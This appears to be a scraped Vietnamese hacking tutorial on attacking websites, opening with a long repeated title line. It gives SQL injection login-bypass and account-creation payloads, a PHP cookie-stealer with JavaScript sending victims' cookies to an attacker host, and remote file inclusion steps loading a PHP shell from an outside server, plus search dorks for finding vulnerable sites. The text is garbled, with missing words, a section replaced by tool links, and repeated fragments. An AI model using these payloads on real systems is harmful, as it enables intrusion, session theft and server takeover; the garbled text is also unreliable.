kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website kỹ thuật attack một website
kỹ thuật attack website Bài viết chia làm phần sau : QUOTE 1> Tìm hiểu đối tượng attack 2> a SQL Injection - Login Bypass b.SQL Injection - Lấy thông tin table 3> a XSS - Cookie Stealer ( đánh cắp cookie ) b JavaScript Injection 4> Remote File Inclusion 5> a Null Byte - Picture Upload b.Null Byte - CGI Exploitation 6> Tổng kết 1> Tìm hiểu đối tượng attack : Đây bước khởi đầu quan trọng ko thể thiếu muốn công trang web Chúng ta cần sử dụng tool chuyên dụng để scan thông tin trang web ví dụ tìm port mở , xem thông tin host Trước tiên , tìm xem port mở host web , bạn sử dụng chương trình Super Scanner Foundstone ( chương trình dễ sử dụng ) , chương trình scan NMAP mà đa số cho scan tốt Với port mở mà bạn tìm thấy , xem chúng thuộc dạng , tìm hiểu cấu hình directory host web Tìm hiểu thêm thông tin khác , ví dụ registrar domain , sử dụng trang web whois : CODE http://whois.networksolutions.com/ CODE http://www.dnsstuff.com/ bạn có thông tin giá trị trang web đối tượng 2> a SQL Injection - Login Bypass : Cơ đơn giản SQL Injection login by pass , với trang web bị lỗi SQL Injection sử dụng ký tự sau : CODE ‘OR 1=1-điền vào phần username password trang login , " qua mặt " SQL query để có " đặc quyền" trang web bị lỗi Hoặc bạn điền vào link URL trang web lỗi , ví dụ gọi trang web lỗi SQL Injection target.com : CODE www.target.com/index.php?id=0 Chúng ta inject SQL sau : CODE www.target.com/index.php?id=0 ‘OR 1=1-Và thu kết tương tự bước Đây vài injection sử dụng : CODE admin'-' or 0=0 -" or 0=0 -or 0=0 -‘hi or 1=1-Đây bước đơn giản kỹ thuật SQL Injection , nhiên đôi lúc ko có kết rõ ràng trang web lỗi CODE http://www.sqlsecurity.com/ - Thông tin chung SQL Security/Injection http://w3schools.com/sql/default.asp - Học tìm hiểu ngôn ngữ SQL 2> b SQL Injection - Lấy thông tin table : Đây kỹ thuật cao cấp khai thác SQL Injection Gồm bước _ trước tiên tạo lỗi trang web bị SQL Injection để tìm table names ( nhằm mục đích tạo account đặc quyền ) Tiếp tục lại tạo thêm error khác để có table name quan trọng Và cuối inject SQL để tạo admin's account Để có kết cuối , trước hết trang web bị lỗi login với username sau : CODE ‘Having1=1-Ko điền password nhấn enter , nhận thông báo lỗi ( error ) với table name , tương tự sau : SQL Column user_member.user_id is invalid and was not found ( lưu ý phần chữ tím ví dụ table name ) , thông báo error dài quan trọng cần table name , ví dụ ‘user_member.id’ chứa thông tin username , thực bước nhằm tìm thêm table name quan trọng khác : SQL ‘UNION SELECT * FROM user_member WHERE USER_ID=‘admin’ GROUP BY USER_ID HAVING 1=1;-Error nhận sau : QUOTE Column user_member.user_id is invalid and was not found … Column user_member.passwd is invalid and was not found table nhận user_member.passwd table chứa password , thông qua table tìm tạo account với đặc quyền admin : SQL ‘INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES(‘VietLuv’,’hacked’,’hacked’,GETDATE();-Và login với quyền admin username VietLuv password hacked Trên khai thác SQL Injection , hacker thông qua SQL Injection để tìm table chứa thông tin quan trọng credit card v v Cần tìm hiểu thêm kiên nhẫn để đạt kết mong muốn Các thắc mắc bạn post hỏi 3> a XSS - Cookie Stealer ( đánh cắp cookie ) : Ở phần nói XSS ( hay CSS ) >> Cross Site Scripting , cách đặt code để lấy cookie guestbooks forum bảo mật lưu lại sau user đăng nhập Cookies hầu hết forum sử dụng nhằm xác nhận lại thông tin user , cookie có cho user , lấy cookie user bắt đầu trở thành user Trước tiên sử dụng PHP để tạo nên script lấy cắp cookie CODE /*VN�Magic�Cookie�Stealer�*/ /*Put�this�up�in�your�hosting�*/ $cookie�=�$_GET['cookie']; $log�=�fopen("cookiesVNM.txt\",\"a\"); fwrite($log,�$cookie�.\"n\"); fclose($log); ?> Copy save đoạn code thành stealer.php Dưới nội dung đoạn code : HTML $cookie = $_GET['cookie']; đừng quên dòng quan trọng : HTML $log = fopen("cookiesVNM.txt","a"); bạn tạo trang txt trống tên cookiesVNM.txt Upload file nói lên host bạn đừng quên chmod file cookiesVNM.txt 666 >> Như bạn có script lấy cắp cookie Và site bị lỗi XSS Injection , bạn test cách post đoạn code sau phần cho phép site : HTML alert(’Testing For XSS Hole’) nhận Alert box ghi Testing For XSS Hole site chắn dính lỗi Và đánh cắp cookie cách dùng đoạn code sau : HTML window.location = 'http://yoursite.com/stealer.php?cookie' + document.cookie; đoạn code redirects member đến trang stealer.php bạn tạo lưu lại cookie file cookiesVNM.txt Bạn tìm hiểu rõ XSS viết Hacking Guestbooks GirL_Noob 4> Remote File Inclusion : Remote File Inclusion ( gọi tắt RFI ) lỗi tìm thấy nhiều trang web Cách khai thác lại vô đơn giản nên nói chung phổ biến thời điểm Cách khai thác lỗi Remote File Inclusion hiểu web page ta đặt file ( ví dụ file uploader hay php shell ) ,webserver webpage hiểu hiển thị theo php script _ sễ dễ dàng có đầy đủ quyền kiểm soát server Nói rõ website hiển thị trang khác , sửa lại URL link đặt trang code php shell vào "hiểu lầm " trang cần thị có trang php shell server website Mỗi người tìm thấy trang bị lỗi cách riêng họ , phạm vi viết nói đến cách dùng Google để tìm kiếm site bị lỗi Ta tìm kiếm : CODE inurl:"index.php?page=" Google cho kết trang có "index.php?page= link url , cách đơn giản để test site bị lỗi thêm vàowww.google.com đằng sau dấu = link site : CODE www.site.com/index.php?page=www.google.com Nếu thấy toàn trang google thị site chắn site bị lỗi Để khai thác lỗi dùng file text chứa PHP Shell code up host cho site bị lỗi thị cách thay đổi dòng link URL thêm vào link đến nơi chứa file shell Gọi site lỗi victim , php shell bạn shell.txt , site chứa link bạn yoursite , có sau : CODE http://victim/index.php?page=http://yoursite/shell.txt Quá đơn giản phải ko bạn , php shell VietLuv giới thiệu remview : CODE http://php.spb.ru/remview/remview_2003_10_23.zip Không dùng c99 up sẵn VN Magic : CODE http://matrix2k.org/testsh.txt nghĩa sử dụng php shell VN Magic khỏi mắc công kiếm , thêm đường link vào sau dấu = trang bị lỗi bạn kiếm soát web server PS : Muốn thực hành cho rõ vào Thực hành attack website Quỳnh Anh , chúc vui 5> a Null Byte - Picture Upload : Các tool scan port chuyên dụng : Super Scaner 4.0 CODE http://www.foundstone.com/index.htm?subnav=resources %2Fnavigation.htm&subcontent=%2Fresources%2Fproddesc%2Fsuperscan4.htm chương trình tốt sử dụng Windows Nmap-4.21ALPHA4 CODE http://insecure.org/ NMap coi tool scan tốt Ngoài có tool scan khác Nessus (vulnscanner) : CODE http://www.nessus.org/ ...CODE admin'-' or 0=0 -" or 0=0 -or 0=0 -‘hi or 1=1-Đây bước đơn giản kỹ thuật SQL Injection , nhiên đôi lúc ko có kết rõ ràng trang web lỗi CODE http://www.sqlsecurity.com/... http://w3schools.com/sql/default.asp - Học tìm hiểu ngôn ngữ SQL 2> b SQL Injection - Lấy thông tin table : Đây kỹ thuật cao cấp khai thác SQL Injection Gồm bước _ trước tiên tạo lỗi trang web bị SQL Injection... quyền kiểm soát server Nói rõ website hiển thị trang khác , sửa lại URL link đặt trang code php shell vào "hiểu lầm " trang cần thị có trang php shell server website Mỗi người tìm thấy trang